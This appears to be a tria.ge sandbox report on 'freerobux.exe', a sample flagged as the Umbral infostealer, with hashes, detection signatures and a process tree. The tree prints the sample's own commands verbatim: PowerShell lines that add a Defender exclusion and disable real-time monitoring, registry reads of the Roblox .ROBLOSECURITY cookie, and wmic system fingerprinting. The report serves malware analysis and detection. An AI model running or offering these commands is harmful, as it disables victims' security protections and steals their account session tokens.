Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    24/09/2024, 19:48

General

  • Target

    freerobux.exe

  • Size

    229KB

  • MD5

    b994081ca7787fdf253902e28c1a5c47

  • SHA1

    91c30f314dda937fac7b5133c4f378e6c2cd47ff

  • SHA256

    429170a034f165b7b9223205b04482ba8b1cc5582f9344bf70123c7e7e8e4c3e

  • SHA512

    17b80c2325c0e900fa1a2c026d8eba0c3985ce27bb71c4f226a6d52a3f0122e4ad969fb163d75ec435169ea12c8b9538777986ab2dc498e5529d94ce20d019d4

  • SSDEEP

    6144:FloZMArIkd8g+EtXHkv/iD4vWEs9rI8jP67NokR37b8e1mAi:HoZHL+EP8vWEs9rI8jP67NokRv+

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\freerobux.exe
    "C:\Users\Admin\AppData\Local\Temp\freerobux.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3044
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\freerobux.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2656
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2264
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3000
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1488
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2244
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2028
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
        PID:536
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:2348
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic" path win32_VideoController get name
        2⤵
        • Detects videocard installed
        PID:1256

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      7KB

      MD5

      1e7ed5fcbca860fdce9d6a892d52c0a3

      SHA1

      3bbbbba92f4a3bea2d43fe2deeea9a3f3290bbf7

      SHA256

      3e2bcb98ddb9dd3c7f602a12083993e14a8740dd70c31f5e99e9c159304e4d19

      SHA512

      666e251d10df588c4cf66ee1e2034513b766fa259114db44ea02dd13e7b00c299c87047099d618f3bf703bb606410dd6f99b227bff60b11b1b6f056a0ac0dde0

    • memory/2264-20-0x0000000001E80000-0x0000000001E88000-memory.dmp

      Filesize

      32KB

    • memory/2264-19-0x000000001B690000-0x000000001B972000-memory.dmp

      Filesize

      2.9MB

    • memory/2656-10-0x000007FEEBC10000-0x000007FEEC5AD000-memory.dmp

      Filesize

      9.6MB

    • memory/2656-9-0x0000000001FC0000-0x0000000001FC8000-memory.dmp

      Filesize

      32KB

    • memory/2656-11-0x000007FEEBC10000-0x000007FEEC5AD000-memory.dmp

      Filesize

      9.6MB

    • memory/2656-12-0x000007FEEBC10000-0x000007FEEC5AD000-memory.dmp

      Filesize

      9.6MB

    • memory/2656-13-0x000007FEEBC10000-0x000007FEEC5AD000-memory.dmp

      Filesize

      9.6MB

    • memory/2656-8-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

      Filesize

      2.9MB

    • memory/2656-7-0x000007FEEBECE000-0x000007FEEBECF000-memory.dmp

      Filesize

      4KB

    • memory/3044-0-0x000007FEF4C83000-0x000007FEF4C84000-memory.dmp

      Filesize

      4KB

    • memory/3044-2-0x000007FEF4C80000-0x000007FEF566C000-memory.dmp

      Filesize

      9.9MB

    • memory/3044-1-0x0000000000F90000-0x0000000000FD0000-memory.dmp

      Filesize

      256KB

    • memory/3044-51-0x000007FEF4C80000-0x000007FEF566C000-memory.dmp

      Filesize

      9.9MB